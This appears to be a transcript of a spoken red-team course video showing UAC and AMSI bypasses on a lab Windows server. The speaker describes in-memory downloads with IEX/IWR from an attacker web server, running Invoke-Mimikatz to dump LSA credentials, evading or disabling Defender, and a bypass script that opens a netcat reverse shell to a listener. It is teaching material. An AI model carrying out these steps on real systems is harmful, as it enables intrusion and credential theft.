All right, so now we're going to be taking a look at bypassing UAC and AMSI bypass, right? So we can see that over on my machine over here that real-time protection is turned on. Okay, so if we go ahead and we try to download something over here like a UAC bypass, and we can tell that we have to bypass UAC because we are an administrator, right? A built-in administrator, which means that we are a local administrator. Okay, we're not a domain admin, we're a local admin, and we can see that this group is used for deny only. We see quite a few of these. And also, if we're a local admin and this was actually working, we should have a lot more privileges down here, right? We don't have any good privileges down here. So let's go ahead and let's see if we can't actually we're part of domain admin group used for deny only. Okay, so we actually are, and it's still used for deny only. So let's go ahead and bypass UAC. All right, so to be able to do this, what we need to do is we need to first be able to do an AMSI bypass. We need to do that because real-time protection is turned on. Now, usually this isn't something that you have to actually do with real-time protection. All right, so what we're going to do is within your PDF, you already have this bypass UAC. You already have the location of it and everything like that. We can actually remove the invoke mimikatz. We actually download another version of that there. But you already have that bypass UAC in there. And we also have the AMSI bypass. Now, hacking is a cat and mouse game, right? Hackers are always coming up with new ways to bypass things, and the defense is always coming up with new ways to kind of try to stop you from bypassing those things. So just because this works today doesn't mean that this bypass is going to work tomorrow. You may have to find a different bypass to be able to use. Okay, let's go ahead and we're going to scroll through this. Let me go ahead and exit out here. Actually, I'm going to start up a new PowerShell. There we go. Okay, and we'll go ahead and we'll scroll through this. We're just going to delete these numbers off of here. You can put this all in at once or one at a time, however you want to do it. We enter here, and we now bypass UAC. Now I'm actually going to exit out of here just to show you what happens if we don't bypass it beforehand, because it's bypassed within memory. So once we exit out, we need to re-bypass UAC, or we need to, re-bypass AMSI. Okay, so I'm just going to show you what happens if we don't do that. So let's go ahead and let's start up a PowerShell script over, or a Python web server over here through a Python 3. HTTP server on port 80. We'll go ahead and hop back over to here. IEX IWR, use basic parsing, HTTP 192.168.0.186 / bypass UAC.ps1. Some of you younger guys may be wondering what the heck this use basic parsing is. So back in the day, Internet Explorer, if it hadn't been started yet, or Microsoft Edge, then you weren't able to download things. All right, even if you were downloading them into memory, like we are right here, that's what we're doing here. We're actually downloading it into memory, so it's only going to be within the memory of this PowerShell script. It won't be on disk, which most antiviruses don't look at disk or don't look at memory. They usually look at what's on the disk, right? So downloading memory is just a easier, safer way to be able to try to bypass things. And also, once you close this PowerShell, it's gone, right? So cleanup is super easy. But that use basic parsing was used to kind of bypass if Windows or Internet Explorer or Edge had never been started yet. So if you're working on an old server, you may have to use basic parsing like right there. So we'll go ahead and we'll put that in there. We'll do a bypass UAC. All right, attack method, and then we'll try our method here of TCM setup. Okay, and for some reason, this happened last time too, where it just worked. No idea why it just worked. We didn't have to do an AMSI bypass. I literally just made a video on this. It worked, and then it didn't work, and then it worked, and that didn't work. So we're going to go ahead and let's try to put mimikatz on here. Mimikatz should definitely be caught. Let's go ahead and check that um, network protection settings again, like real quick. Manage settings. Real-time protection is on. Okay. We don't want to turn on automatic sample submission. We don't want to turn that on or anything like that. Just want to turn it off, and then we'll turn it back on again. All right, so now that's turned back on again, right? Let's go ahead and try that one more time. It's going to tell us it doesn't like to run into the same one. All right. So let's go ahead and we'll exit out of here. We'll open up another PowerShell. We'll go ahead and we'll do this again. Oh, got to re-put it in memory, don't I? See, as I stated, it's in memory like right now. Okay, let's go ahead and try that again. We should be getting some type of error stating that, hey, this is a malicious script. All right, we're obviously not. Let's go ahead and try mimikatz maybe, But like I said, I was getting this before, and then I didn't get it, and then I got it again, then I didn't get it. So I guess it really just all depends on how um, PowerShell feels that day. So we're gonna go ahead. We're gonna head out to find a Mimikatz script. Right now, this PowerSplate one, that one does not work anymore. Or at least I haven't gotten it to work in a while. But if we do an invoke Mimikatz GitHub, there's another one. Not by Gus. It's by Nishank should work. All right, this one should definitely work like right here. All right, let's go ahead and grab this. This is also the guy that makes the CRTP, the Certified Red Team Professional course. Same as that group of people, or same as that guy. Okay, we'll go ahead and we'll wget that. We'll start up another PowerShell or a Python script. Man, all these P's are getting me, all these bypasses and P's are messing me up. All right, let's go ahead and let's try to put that into there. And that was invoke Mimikatz. .ps1. All right, so that has been blocked by our antivirus, right? It did not like that. It didn't mind the bypass UAC. I don't understand why, but it does not like this invoke Mimikatz one. So that's okay. All right, sometimes it won't like that bypass UAC as you see in your PDF. So let's go ahead and let's drop in our AMSI bypass, hit enter, and we'll go ahead. We'll run that same command again with invoke Mimikatz. And it seems like it's downloading. It seems like it's putting it into memory because the AV isn't looking at memory. The only thing that looked at memory was this PowerShell, right, that we have open. And it's in there. So if we do an invoke Mimikatz, we can do command LSA dump LSA /patch. Now we most likely won't be able to do this because we're not on administrator shell like right now, right? But this is just to prove that, yes, we have bypassed AMSI. We bypassed system, okay? Now, Defender did not like it. Microsoft Defender antivirus follow threats. Get details, okay? Let's go and try that same thing over here. I don't know if it's going to work. I have no idea. I haven't really tried it. And before I even do that, let's go ahead and do a who am I /all. So we can see that we have bypassed that UAC. We now have a ton more privileges, right? A bunch of them are disabled, but we can impersonate client after authentication, which you'll learn about later on. And we can also see that we are a domain or a administrator and also a domain admin. We see that we're both of those, right? So we're a local administrator and domain admin on this account for student, right? Now I didn't do that on purpose. That's just because I gave so many privileges to student, and I want to make sure that we just use one account pretty much the whole time, so we weren't popping around different accounts. So let's go ahead and let's try to throw this into there again with that invoke Mimikatz. .ps1. All right, it's been blocked. That's fine. We'll go ahead and we'll throw that in there. Oh, that's bypass UAC. There we go. Invoke Mimikatz. All right, and if it doesn't work this time, what we can actually do is we can actually turn off Defender. I'd have to look it up again because I haven't done that one in a while, but we can actually turn off Defender and actually, do things within that. But let's go ahead and do an invoke Mimikatz, which will probably be another video. Attack command, LSA dump, LSA /patch. Let's see if that works or if Defender's going to pick it up once we actually run it. Mimikatz is probably the worst one, and it did actually run it. Defender picked it up, but it did actually run it. So if we were to save that to a file, we got it. Because I don't know if you guys saw it real quick, that run. But if we were to actually save that to a file, we're good. We just go back in, do it again. Go back in, do it again. However you want to do it. Or we could look up how to actually disable Defender because we do get administrator shell because we bypassed that UAC because we did the AMSI bypass in the beginning and we're able to now run Mimikatz on the machine. All right, so a lot of things like right here, a lot of things thrown out there, but a lot of just kind of like, oh, I see that this is group used for deny only. Let's go ahead and bypass UAC and then start to work at it from there, right? So let me go ahead and let's try one last thing. I'm going to go ahead and I want to try to see if my old script will work. I think the newest PowerShell just doesn't like the old script, but we're just going to go ahead and give it a quick try. So I can go ahead and go to overgrown caret 1 GitHub. That's my walkthrough, just so you know, in case you're like, he's using a walkthrough. That's my old walkthrough. And what I want to do is I actually want to look up my bypass UAC in here, somewhere in here. Or not bypass UAC. Yeah, I think it is. But this one, like right here, can be used on older systems, I know. And what this will do is actually, if let's say we're in WinRM or something like that, and we can't actually get a like we can't see any pop-ups, this will actually call for it to come back to um, this will actually call for it to come back to an IP address that you put in. Okay, so we'll go ahead and we'll wget this. And we also need to get one more thing once we do this. So we're just going to do a quick wget, that guy right there. And then we also need to get nc64.exe because that also needs to go on the system. So if you're not able to see a pop-up, this could be used. But like I said, it worked on older ones. Don't know if it's going to work on the newer ones. We'll give it a quick try. Let's go ahead and move from downloads. nc64.exe to right here. And then what we can do from here is we can just go ahead and start up another web server, head back over into Windows Server, and we'll do our AMSI bypass because it's not going to like both of those. And then we'll go ahead and we'll do an IEX IWR. There we go. Okay. And that was invoke bypass, right? .ps1, I believe. Invoke bypass.ps1. Yep. And if you actually read the script, it actually says to make a directory on ctemp, cd into there, and then we're going to do a wget http, and you could also do a use basic parsing for that also. Right after that wget, you could also do a use basic parsing, nc64.exe, tac O to save the file, nc64.exe. That's because the script is going to look there for this this invoke bypass script is going to look here. Okay, so if we do an invoke bypass, lhost, and we're going to put in 192.168.0.186, and then lport, we'll say 445. Let's go ahead and hop back over to Kali. We will do a rl wrap from port 445. We're just going to do a quick test, see if this will work or not. Like I said, I don't know if it works on the newer systems. Looks like we did something. It says threats found. Didn't seem like that very much. Let's go and hop back over to here, and we do get it back. Who am I? So if we weren't able to, let's say, see that pop up, you saw that just went like right through, right? It did find it. I saw it, but we have now bypassed UAC, and we have everything on there again. Okay, so that's invoke bypass UAC or invoke bypass.ps1 script that I made a while ago, and that worked also. So hopefully you all learned something. I hope you all picked up something new, and I will talk to you all later.